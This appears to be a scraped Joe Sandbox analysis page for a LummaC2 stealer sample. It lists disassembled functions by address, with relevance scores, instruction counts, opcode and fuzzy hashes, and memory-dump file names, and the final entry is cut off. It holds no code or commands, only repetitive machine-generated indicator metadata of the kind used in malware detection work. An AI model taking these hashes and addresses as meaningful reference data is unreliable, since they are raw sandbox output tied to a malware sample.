Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e527418556e881e7e9e22a7925378fbf90136d1f2922bd1f8ced10e2076585bb
Instruction ID: b3adcd91b801573fd29fd8c505a54bfc56d01f9f00f349ead0ead05a6998e8af
Opcode Fuzzy Hash: e527418556e881e7e9e22a7925378fbf90136d1f2922bd1f8ced10e2076585bb
Instruction Fuzzy Hash: D2B18F71A483914BDB16CF25C88267BB7E5EFF5744F18892CE48687381E639DC06C792

Function 009E1D10 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d2f866cd5f5c8d3f0a56721b86d244f47534991795a6266927b776a40c7235
Instruction ID: 2632ab3f7d0f7279fd95429aad9df594ed5af09207ef755ae940d8a9f653444e
Opcode Fuzzy Hash: a2d2f866cd5f5c8d3f0a56721b86d244f47534991795a6266927b776a40c7235
Instruction Fuzzy Hash: 84A106B1A043419BD7249F25C892B6BB7A5EFC4364F18892CF9898B381E774ED05C792

Function 009DD840 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 393f0045e0d8f251843eee8a32fc34365733e68525cc1621a41216f530a62e69
Instruction ID: fad9aecbf170456b537ff9976e5bd50a37c5855e3a74d72921705fcd74a82ae6
Opcode Fuzzy Hash: 393f0045e0d8f251843eee8a32fc34365733e68525cc1621a41216f530a62e69
Instruction Fuzzy Hash: 9DB1067594A301AFD7109F24CC41B2ABBE2AFC4354F158A2DF4E4933A0D772AD56DB41

Function 009FE1F0 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea3df9d6176c992ef5e4f2af7ae948ce0a4b1f935c082b3b806cb20ca7aa9949
Instruction ID: cef39b5ba7bd711c94b6d8f2bbf81580010313d251127b32d8987705908502b3
Opcode Fuzzy Hash: ea3df9d6176c992ef5e4f2af7ae948ce0a4b1f935c082b3b806cb20ca7aa9949
Instruction Fuzzy Hash: FC91D3756043199FCB24CF18D880A7AB3E6FFD8714F19892CEA9597261DB74EC11CB82

Function 009EDFC3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5642b12e1bce20de1fbdd5a1c6cc9c11b262fde4427d2c652b47556e2714d7e7
Instruction ID: 802b09909afcb8f48e3d3b2639a98f286f40856b4f72525c9cc997ef751ef435
Opcode Fuzzy Hash: 5642b12e1bce20de1fbdd5a1c6cc9c11b262fde4427d2c652b47556e2714d7e7
Instruction Fuzzy Hash: 63D1F172608B814BD319CA39C8913A7BFD25BD6324F19CA7DD4EB877C6D578A405C702

Function 009FDEB0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f8b2f1d1ed793c768bf30e9e27a07f533a95c62077a1f02ceeca488143931b92
Instruction ID: 6510d53611d19eb86a075e4b93e85e88917cecf1d273a71029c1111b9ab3c7de
Opcode Fuzzy Hash: f8b2f1d1ed793c768bf30e9e27a07f533a95c62077a1f02ceeca488143931b92
Instruction Fuzzy Hash: AA91D1757092099FD724DF19C890A7AB3E2EFD9710F15852CEA858B365DB30EC11CB86

Function 009E7A40 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a1bca59db090beb1c963203e47a6b08a45a65e0edee5b68d48eaeae66bd0f0
Instruction ID: 37be433f1b74f83fbdf8f0dd8ab0439b52223329b45b3cf3d48670db1afbcb02
Opcode Fuzzy Hash: 48a1bca59db090beb1c963203e47a6b08a45a65e0edee5b68d48eaeae66bd0f0
Instruction Fuzzy Hash: 5DB1F531E04686CFDB15CFB9D8A076EB7B2AF8A320F2942A9D4515B3D1CB359D42CB50

Function 009C61D0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction ID: 508bda584039a30ecc7b71aafd2f29707a6f00baaec90dd50c99c5d7d8f5d1a7
Opcode Fuzzy Hash: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction Fuzzy Hash: C0C16AB2A487418FC360CF28DC96BABB7F1BF85318F08492DD1D9C6242E778A155CB06

Function 009E8C46 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29121e03cf11a5996dae099f99fdbdc6746331396d9d54e20bb1965d275383af
Instruction ID: 64877707aa53060ab98f0b62d4153257735f3fdd95b1703de13631727850ba97
Opcode Fuzzy Hash: 29121e03cf11a5996dae099f99fdbdc6746331396d9d54e20bb1965d275383af
Instruction Fuzzy Hash: 0CA112B09083859FD714CFA9C89275BB7E1AF96304F04492CF5998B392E779D806CB86

Function 009FDBB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e9eeca078731fc9c4011fcca7fd564077798b1ab200cf6aef6bad8e972b835d
Instruction ID: bcb0f2f71fcc15659f365d0a75a2209f0ca6635e9447f108afee980bdf10725a
Opcode Fuzzy Hash: 5e9eeca078731fc9c4011fcca7fd564077798b1ab200cf6aef6bad8e972b835d
Instruction Fuzzy Hash: CF814A76A062189BC725DF18C88067FB3A7EFD9710F19C52CD9C59B294EB30AD11D781

Function 009DD560 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3571a7b9db4e65ebc3b2ec47a21c9d750f470961e7ea2997a5967f46a1b42fc9
Instruction ID: abb5ec17676b94b79c2c02feee80a894e20b78448e9844295cc2ec71943788d6
Opcode Fuzzy Hash: 3571a7b9db4e65ebc3b2ec47a21c9d750f470961e7ea2997a5967f46a1b42fc9
Instruction Fuzzy Hash: 37915A72A492614FCB258E28C8513AE7BE1ABC5324F19C67EE8B9873D1D734DC0697C1

Function 009E7D94 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd23f86da5ae911da730fb8a141ab5c731714128cef07b011d3608c2bcf25ce9
Instruction ID: f570a8401d799a249437f9d78297568ff069c9dfca182aaf723d7c57a81307aa
Opcode Fuzzy Hash: cd23f86da5ae911da730fb8a141ab5c731714128cef07b011d3608c2bcf25ce9
Instruction Fuzzy Hash: FE91EDB6E04249CFDB14CFA5D895BAEBBB1BB88314F19412CE5066B391C775A802CF81

Function 009F74F0 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980c697c68fef8da730942f78dcf3367cad175aba57a76c877f8db06dc6c9e42
Instruction ID: 468ee9054ac3998f10201d77ed8c3ce34d974c0f8028f29a8ed169aa3c60ad98
Opcode Fuzzy Hash: 980c697c68fef8da730942f78dcf3367cad175aba57a76c877f8db06dc6c9e42
Instruction Fuzzy Hash: 4F6157B261C309ABD714DFA8DC8577BB7D6EBC4304F14882CE685C7290EA79D906C792

Function 009FA0D0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4c7e5c02b87289805bf60fbdc64b4b7859b0a46db8c3adc116e916a971264e8
Instruction ID: eeb044a8f5dc718fe293524e06459961a2ddac58a2030ba2a5d6f0a02f3bcd3d
Opcode Fuzzy Hash: e4c7e5c02b87289805bf60fbdc64b4b7859b0a46db8c3adc116e916a971264e8
Instruction Fuzzy Hash: 835146B57083088FEB249F64D85177B77E5EB95714F19882CD6CA97382E632AC018B86

Function 009FA510 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a5875764cae0a8ff9a8d1c405ef52fc9020b84aa3baa436ff96a61413f9874
Instruction ID: 19d27ba9a1779b5f9893843cb0fd1eade40d143f09a20a179e4d14f7fdb9c801
Opcode Fuzzy Hash: f8a5875764cae0a8ff9a8d1c405ef52fc9020b84aa3baa436ff96a61413f9874
Instruction Fuzzy Hash: 3D516975A043188FD720DF28C8C067BB7A6EBD9724F29892CD6D997261D735DC02C782

Function 009DDFC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b30bdb9a6d053714534d58f4b72ea932ab0a16a0daff0bc5844222fbe35ddf1
Instruction ID: 297764cf3a3908e65526f42bb82ac7873dccac06de773fedc883392e89a2d6dc
Opcode Fuzzy Hash: 9b30bdb9a6d053714534d58f4b72ea932ab0a16a0daff0bc5844222fbe35ddf1
Instruction Fuzzy Hash: 63610B337DDA804BD728A97C5C922A579934BD7330B2DC77E96B58F3E1D9A94C024340

Function 009FCBA6 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 805c85e60f78c5e9ff3fb70169ef6222f0a93790779598740956b3179dd6aa83
Instruction ID: eb8794fcc549c08924ec7a3c6a41c02b0c7f3a9203b7403b826728b9fdb61ae4
Opcode Fuzzy Hash: 805c85e60f78c5e9ff3fb70169ef6222f0a93790779598740956b3179dd6aa83
Instruction Fuzzy Hash: 1E412573B183544BD318CE39899226BBBD69BCA620F1ACE3DC9D9D7281D938DC024781

Function 009E30E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a78eb772fa69a1f7b520e604d02a685243be1a9295196eb7fdb6d14be0209f
Instruction ID: ca9e9c5b05ed433c298542ee5be5905547d518770eb459835c91fcc0d7b5f3db
Opcode Fuzzy Hash: 50a78eb772fa69a1f7b520e604d02a685243be1a9295196eb7fdb6d14be0209f
Instruction Fuzzy Hash: 6A51F475A18206CBE718CF69DC613A673E2FB88311F198A7CE985D7294DB79DC12CB40

Function 009F5FF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction ID: adc098f7773000bde53a467be2473da2929d58a4466d8ae3d9ba426cfe1c4fe3
Opcode Fuzzy Hash: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction Fuzzy Hash: 92517DB16087448FE714DF29D89436BBBE1BBC4314F144E2DE5E583351E779DA088B82

Function 009D92C0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ffd63fa99b66bab01f54a68f601746811a684d14f3f267d8d4ce4918eafa7e0
Instruction ID: 63a39b0a33c44ef80050c0367f189947b6bdd6426cca944aa22290362dca5845
Opcode Fuzzy Hash: 5ffd63fa99b66bab01f54a68f601746811a684d14f3f267d8d4ce4918eafa7e0
Instruction Fuzzy Hash: 0F5128B2944214DBC710AF64DC92BABB3E4FF9A354F08852EF995873A1E7349801C752

Function 009CEDB4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb1e0c3455619599cdd85a201154dc73f1f9ef3c02312af959e1cfc039a1c2b1
Instruction ID: 8930321f04b08aa7f8032dd6cb2919da80aabb45ce7943b24d6f4d2ce2afd2e8
Opcode Fuzzy Hash: eb1e0c3455619599cdd85a201154dc73f1f9ef3c02312af959e1cfc039a1c2b1
Instruction Fuzzy Hash: 6C510675A083C08FD724CB28D880BBEB7E7ABD9354F24C92CD4C797295DB3588428786

Function 009DAAE0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c840f0d9d57f134d69c7b6660aea34eafa44bf2894a3c1382a67cd84ff9bf28
Instruction ID: 5bd496a87153a6ae2d525d117094125bcfde31dfe57ade5e05ef2afd98841461
Opcode Fuzzy Hash: 5c840f0d9d57f134d69c7b6660aea34eafa44bf2894a3c1382a67cd84ff9bf28
Instruction Fuzzy Hash: FC5137337999914BD728CA7C4C213A66A934BE7330B2DCB6BD4F1873E5D56948139342

Function 009EB078 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e94bec5ff4ef951ac247da29c9b011af7586093993add563cf41c9f45e9b6d9
Instruction ID: cf28ae72fcde5df09bef2195e1e6bcc3526ba6634d0b3e2adce2de615a3c065b
Opcode Fuzzy Hash: 9e94bec5ff4ef951ac247da29c9b011af7586093993add563cf41c9f45e9b6d9
